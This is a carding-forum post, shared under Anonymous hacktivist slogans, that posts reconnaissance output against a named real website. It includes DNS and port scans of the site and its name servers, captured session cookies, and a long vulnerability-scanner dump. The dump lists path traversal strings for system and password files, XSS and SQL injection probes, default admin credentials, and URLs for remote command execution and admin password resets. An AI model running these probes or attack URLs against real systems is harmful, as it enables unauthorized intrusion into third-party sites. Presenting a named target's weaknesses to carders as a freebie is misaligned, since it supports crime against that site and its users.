If you have any questions, contact us:
Telegram:maintex
ICQ:1607000


Go Back   Cyber Security Forum > VIP Carding Forum > Freebie

Notices

Freebie Free CC+CVV, Dumps & Pins, Free Paypal accs

Reply
 
Thread Tools Search this Thread Rate Thread
  #1 Old 06-15-2015, 07:34 AM
emailsnipper
 
emailsnipper's Avatar
 
Join Date: Apr 2015
Location: Carder
Posts: 157
emailsnipper is an unknown quantity at this point
Post ANONYMOUS Collection

I am not author of these articles, but I collected them and share.
Thanks all for reading.

Code:
WE ARE ANONYMOUS
WE ARE LEGION
WE DO NOT FORGIVE 
WE DO NOT FORGET
EXPECT US...
GREETING BEAUTIFUL WORLD <3
a light pentest exploitation of WWW.WHITEWORLDMEDIA.COM / @80%
http://www.whiteworldmedia.com/
Non-authoritative answer:
www.whiteworldmedia.com	canonical name = n4q9w.sitelockcdn.net.
Name:	n4q9w.sitelockcdn.net
Address: 149.126.77.49
--
scan report for 149.126.77.49.ip.incapdns.net (149.126.77.49)
Host is up (0.13s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
80/tcp   open     http
443/tcp  open     https
--
Name Servers                ip
---------------------------------
ns1.dnsbycomodo.net:     8.20.241.1
-
scan report for ns1.dnsbycomodo.net (8.20.241.1)
Host is up (0.083s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
111/tcp  open     rpcbind
--
ns2.dnsbycomodo.net:     8.20.243.1
-
scan report for ns2.dnsbycomodo.net (8.20.243.1)
Host is up (0.073s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
111/tcp  open     rpcbind
--
ns3.dnsbycomodo.net:     8.20.241.2
-
scan report for ns3.dnsbycomodo.net (8.20.241.2)
Host is up (0.094s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
111/tcp  open     rpcbind
--
ns4.dnsbycomodo.net:     8.20.243.2
-
scan report for ns4.dnsbycomodo.net (8.20.243.2)
Host is up (0.073s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
111/tcp  open     rpcbind
--
149.126.77.49
0 site(s) hosted on ip 149.126.77.49
Location:   United Kingdom 
-------------------------------/
CNAME:s of this hostname:  n4q9w.sitelockcdn.net
IP Records:	
103.28.248.49
103.28.249.49
103.28.250.49
149.126.74.49
192.230.67.49
192.230.79.49
199.83.131.49
199.83.132.49
Mail servers:	mx.whiteworldmedia.com
-------------------------------------------------/
http://www.whiteworldmedia.com/robots.txt
----------------------------------------.
Sitemap: http://whiteworldmedia.com/sitemap.xml
User-agent: *
Disallow: 
--
HTTP Headers for www.whiteworldmedia.com
==============
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 05:25:09 GMT
Content-Type: text/html
Content-Length: 15695
Connection: close
Server: Apache/2
Set-Cookie: is_mobile=0; path=/; domain=www.whiteworldmedia.com
Last-Modified: Sun, 14 Jun 2015 10:18:39 GMT
ETag: "3d4f-51877aa3d34e0"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Mon, 15 Jun 2015 05:40:09 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: -1
Set-Cookie: visid_incap_286820=P8KiRIv4TFW4ZL4jhkibcLVhflUAAAAAQUIPAAAAAAD3PlqKIUMclhHCrZEwKpO+; expires=Tue, 13 Jun 2017 10:43:35 GMT; path=/; Domain=.whiteworldmedia.com
Set-Cookie: nlbi_286820=90bZd59qM203KtZwrumAuwAAAABY7qQ2+5rGfXI4m3hDx3Oi; path=/; Domain=.whiteworldmedia.com
Set-Cookie: incap_ses_238_286820=i9jyEE/WQBNp1iv1M4xNA7VhflUAAAAAvarBfhP4dgyFrK7VcChSNA==; path=/; Domain=.whiteworldmedia.com
X-Iinfo: 7-45603472-45603473 NNNN CT(25 -1 0) RT(1434345909310 0) q(0 0 0 0) r(0 0) U6
X-CDN: Incapsula 
-----------------------------------------------------------------------/
EXPLOITS:
--------
The URL "http://www.whiteworldmedia.com/" has the following allowed methods: GET, HEAD, OPTIONS, POST, TRACE
-
The whole target has no protection (X-Frame-Options header) against ClickJacking attack
-
The URL: "http://www.whiteworldmedia.com/" sent the cookie: "incap_ses_108_286820=rDo8ELWRelE/6N+Ie7F/AWh1flUAAAAA0yh2GSqUN8wxHFSy4ssR/g==; path=/; Domain=.whiteworldmedia.com".
-
plugin found a vulnerability at URL: "http://www.whiteworldmedia.com/_vti_bin/shtml.exe". Vulnerability description: "Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. CAN-2000-0413, CAN-2000-0709, CAN-2000-0710, BID-1608, BID-1174."
-
plugin found a vulnerability at URL: "http://www.whiteworldmedia.com/cgi-bin/visadmin.exe". Vulnerability description: "This CGI allows attacker to crash the web server. Remove it from the CGI directory."
-
plugin found a vulnerability at URL: "http://www.whiteworldmedia.com/cgi-bin/auth_data/auth_user_file.txt". Vulnerability description: "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information
-
plugin found a vulnerability at URL: "http://www.whiteworldmedia.com/scripts/tools/dsnform.exe". Vulnerability description: "Allows creation of ODBC Data Source".
-
plugin found a vulnerability at URL: "http://www.whiteworldmedia.com/WEB-INF./web.xml". Vulnerability description: "Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l"
-
plugin found a vulnerability at URL: "http://www.whiteworldmedia.com/officescan/cgi/cgiChkMasterPwd.exe". Vulnerability description: "Trend Officescan allows you to skip the login page and access soem CGI programs directly."
-
+ Target IP:          149.126.77.49
+ Target Hostname:    www.whiteworldmedia.com
+ Target Port:        80
+ Start Time:         2015-06-15 01:40:47 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /vgn/legacy/save: Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.
+ /IDSWebApp/IDSjsp/Login.jsp: Tivoli Directory Server Web Administration.
+ OSVDB-6466: /quikstore.cfg: Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt
+ /quikstore.cgi: A shopping cart.
+ /securecontrolpanel/: Web Server Control Panel
+ /siteminder: This may be an indication that the server is running Siteminder for SSO
+ /webmail/: Web based mail package installed.
+ /_cti_pvt/: FrontPage directory found.
+ Server banner has changed from  to Apache/2 which may suggest a WAF, load balancer or proxy is in place
+ Retrieved x-powered-by header: PHP/5.3.13
+ /nsn/..%5Cutil/attrib.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/chkvol.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/copy.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/del.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/dir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/dsbrowse.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/glist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/lancard.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/md.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/md.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/rd.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/ren.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server 
+ /nsn/..%5Cutil/send.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/set.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/slist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/type.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cutil/userlist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cweb/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cweb/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cwebdemo/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /nsn/..%5Cwebdemo/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
+ /upd/: WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /CVS/Entries: CVS Entries file may contain directory listing information.
+ OSVDB-8450: /3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ OSVDB-8450: /pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
+ /catalog.nsf: A list of server databases can be retrieved, as well as a list of ACLs.
+ /cersvr.nsf: Server certificate data can be accessed remotely.
+ /domlog.nsf: The domain server logs can be accessed remotely.
+ /events4.nsf: The events log can be accessed remotely.
+ /log.nsf: The server log is remotely accessible.
+ /names.nsf: User names and groups can be accessed remotely (possibly password hashes as well)
+ OSVDB-31150: /LOGIN.PWD: MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.
+ OSVDB-31150: /USER/CONFIG.AP: MIPCD configuration information. MIPCD should not have the web interface enabled.
+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
+ /cgi-bin/cgi_process: WASD reveals a lot of system information in this script. It should be removed.
+ /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /852566C90012664F: This database can be read using the replica ID without authentication.
+ /hidden.nsf: This database can be read without authentication. Common database name.
+ /mail.box: The mail database can be read without authentication.
+ /setup.nsf: The server can be configured remotely, or current setup can be downloaded.
+ /statrep.nsf: Any reports generated by the admins can be retrieved.
+ /webadmin.nsf: The server admin database can be accessed remotely.
+ /examples/servlet/AUX: Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.
+ /Config1.htm: This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.
+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
+ /WebAdmin.dll?View=Logon: Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.
+ /.nsf/../winnt/win.ini: This win.ini file can be downloaded.
+ /................../config.sys: PWS allows files to be read by prepending multiple '.' characters.  At worst, IIS, not PWS, should be used.
+ /../../../../winnt/repair/sam._: Sam backup successfully retrieved.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
+ OSVDB-728: /admentor/adminadmin.asp: Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =
+ OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
+ OSVDB-2767: /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>: OpenAutoClassifieds 1.0 is vulnerable to a XSS attack
+ OSVDB-4015: /jigsaw/: Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ /anthill/login.php: Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and http://www.cert.org/advisories/CA-2000-02.html
+ /cfdocs/expeval/sendmail.cfm: Can be used to send email; go to the page and fill in the form
+ OSVDB-22: /cgi-bin/bigconf.cgi: BigIP Configuration CGI
+ /ammerum/: Ammerum pre 0.6-1 had several security issues.
+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
+ /cbms/cbmsfoot.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/editclient.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/passgen.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/realinv.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /cbms/usersetup.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C: This check (A) sets up the next bad blue test (B) for possible exploit. See http://www.badblue.com/down.htm
+ OSVDB-59412: /db/users.dat: upb PB allows the user database to be retrieved remotely.
+ /Admin_files/order.log: Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt.
+ /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
+ /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ /cfdocs/snippets/fileexists.cfm: Can be used to verify the existance of files (on the same drive info as the web tree/file)
+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
+ OSVDB-53304: /chat/data/usr: SimpleChat! 1.3 allows retrieval of user information.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /config/: Configuration information may be available remotely.
+ /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
+ /examples/jsp/snp/anything.snp: Tomcat servlet gives lots of host information.
+ /cfdocs/snippets/evaluate.cfm: Can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info
+ /cfide/Administrator/startstop.html: Can start/stop the server
+ OSVDB-10598: /cd-cgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ /cgi-bin/handler: Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands
+ OSVDB-235: /cgi-bin/webdist.cgi: Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands
+ OSVDB-55: /ews/ews/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. http://www.securityfocus.com/bid/2665.
+ OSVDB-5280: /instantwebmail/message.php: Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-3233: /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-5178: /dostuff.php?action=modify_user: Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/
+ OSVDB-5088: /accounts/getuserdesc.asp: Hosting Controller 2002 administration page is available. This should be protected.
+ OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
+ /sqldump.sql: Database SQL?
+ /structure.sql: Database SQL?
+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
+ /level/42/exec/show%20conf: Retrieved Cisco configuration file.
+ /livehelp/: LiveHelp may reveal system information.
+ /LiveHelp/: LiveHelp may reveal system information.
+ OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
+ /logs/str_err.log: Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).
+ OSVDB-6465: /mall_log_files/order.log: EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.
+ OSVDB-3204: /megabook/files/20/setup.db: Megabook guestbook configuration available remotely.
+ OSVDB-6161: /officescan/hotdownload/ofscan.ini: OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.
+ /order/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /order/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /Orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /Orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
+ /pmlite.php: A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details.
+ /session/admnlogin: SessionServlet Output, has session cookie info.
+ OSVDB-613: /SiteScope/htdocs/SiteScope.html: The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.
+ /servlet/allaire.jrun.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.
+ OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
+ /krysalis/: Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot
+ /logjam/showhits.php: Logjam may possibly allow remote command execution via showhits.php page.
+ /manual.php: Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.
+ OSVDB-14329: /smssend.php: PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php
+ OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
+ OSVDB-551: /ncl_items.shtml?SUBJECT=1: This may allow attackers to reconfigure your Tektronix printer.
+ /photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ /photodata/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ OSVDB-5374: /pub/english.cgi?op=rmail: BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.
+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
+ OSVDB-240: /scripts/wsisa.dll/WService=anything?WSMadmin: Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.
+ OSVDB-3092: /SetSecurity.shm: Cisco System's My Access for Wireless. This resource should be password protected.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
+ OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
+ OSVDB-3092: /_vti_txt/_vti_cnf/: FrontPage directory found.
+ OSVDB-3092: /_vti_txt/: FrontPage directory found.
+ OSVDB-3092: /_vti_pvt/deptodoc.btr: FrontPage file found. This may contain useful information.
+ OSVDB-3092: /_vti_pvt/doctodep.btr: FrontPage file found. This may contain useful information.
+ OSVDB-3092: /_vti_pvt/services.org: FrontPage file found. This may contain useful information.
+ OSVDB-28260: /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings.
+ OSVDB-3092: /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals: We seem to have authoring access to the FrontPage web.
+ OSVDB-3092: /_vti_bin/_vti_aut/dvwssr.dll: This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated users. See also : http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1. http://www.microsoft.com/technet/security/bulletin/MS00-025.asp.
+ OSVDB-3092: /_vti_bin/_vti_aut/fp30reg.dll: Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow. See http://www.microsoft.com/technet/security/bulletin/http://www.microsoft.com/technet/security/bulletin/ms03-051.asp.asp for details.
+ OSVDB-473: /_vti_pvt/access.cnf: Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/services.cnf: Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.
+ OSVDB-473: /_vti_pvt/svacl.cnf: File used to store whether subwebs have unique permissions settings and any IP address restrictions.  Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/writeto.cnf: Contains information about form handler result files. Remove or ACL if FrontPage is not being used.
+ OSVDB-473: /_vti_pvt/linkinfo.cnf: IIS file shows http links on and off site. Might show host trust relationships and other machines on network.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-48: /doc: The /doc directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-250: /cgis/wwwboard/wwwboard.cgi: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
+ OSVDB-250: /cgis/wwwboard/wwwboard.pl: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-568: /blahb.ida: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. http://www.microsoft.com/technet/security/bulletin/MS01-033.asp.
+ OSVDB-568: /blahb.idq: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. http://www.microsoft.com/technet/security/bulletin/MS01-033.asp.
+ OSVDB-2117: /BACLIENT: IBM Tivoli default file found.
+ OSVDB-847: /file/../../../../../../../../etc/: The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval.
+ OSVDB-847: /file/../../../../../../../../etc/: The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval.
+ OSVDB-578: /level/16/exec/-///pwd: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec/-///show/configuration: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec/: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec//show/access-lists: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/configuration: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/interfaces: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/interfaces/status: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/version: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/level/16/exec//show/running-config/interface/FastEthernet: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/16/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/17/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/18/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/19/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/20/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/21/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/22/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/23/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/25/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/26/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/27/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/28/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/29/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/30/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/31/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/32/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/33/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/34/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/35/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/36/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/37/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/39/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/40/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/41/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/42/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-18810: /users.lst: LocalWEB2000 users.lst passwords found
+ OSVDB-13405: /WS_FTP.LOG: WS_FTP.LOG file was found. It may contain sensitive information.
+ OSVDB-3715: /nsn/env.bas: Novell web server shows the server environment and is vulnerable to cross-site scripting
+ OSVDB-3722: /lcgi/lcgitest.nlm: Novell web server shows the server environment
+ OSVDB-13404: /com/: Novell web server allows directory listing
+ OSVDB-13402: /com/novell/: Novell web server allows directory listing
+ OSVDB-13403: /com/novell/webaccess: Novell web server allows directory listing
+ OSVDB-4804: //admin/admin.shtml: Axis network camera may allow admin bypass by using double-slashes before URLs.
